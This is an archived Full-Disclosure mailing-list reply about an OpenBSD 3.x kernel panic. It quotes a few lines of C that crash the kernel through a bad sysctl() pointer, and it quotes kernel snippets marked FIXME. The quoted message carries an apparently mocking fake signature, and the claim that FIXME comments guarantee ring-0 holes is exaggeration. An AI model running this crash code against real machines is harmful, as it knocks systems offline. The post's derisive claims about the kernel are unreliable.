Re: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0

[noir () uberhax0r net]

i can confirm this SECURITY vulnerability on all openbsd 3.x.
so apperantly searching for "XXX" and/or "FIXME" strings in obsd
kernel is a guaranteed way to locate a ring 0 vulnerability ...
nice, real nice ;P

some examples;

                char buf[128], *bufp;   /* FIXME */
                int len = sh.s_size, path_index, entry_len;

                /* DPRINTF(("COFF shlib size %d offset %d\n",
                         sh.s_size, sh.s_scnptr)); */

                error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf,
                                len, sh.s_scnptr,
...

/*
 * vslock: wire user memory for I/O
 *
 * - called from physio and sys___sysctl
 * - XXXCDC: consider nuking this (or making it a macro?)
 */

void
uvm_vsunlock(p, addr, len)
        struct proc *p;
        caddr_t addr;
        size_t  len;
{
        uvm_fault_unwire(&p->p_vmspace->vm_map, trunc_page((vaddr_t)addr),
                round_page((vaddr_t)addr + len));
}


grep -rn or cscope is your friend ;)


On Wed, 19 Nov 2003 crispin () immunix com wrote:

> ppl think "hey, local DoS sucks", therefore they are.
> i think "hey, obsd sucks", therefore i am.
>
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
>
> int main ()
> {
>         unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
>
>         return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
> }
>
> it's wide, it's opened, it's surely obsd!
>
> --
> Crispin Coward, Ph.D.          http://immunix.com/~crispin/
> Chief Scientist, Immunix       http://immunix.com
>             http://www.immunix.com/tosell/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html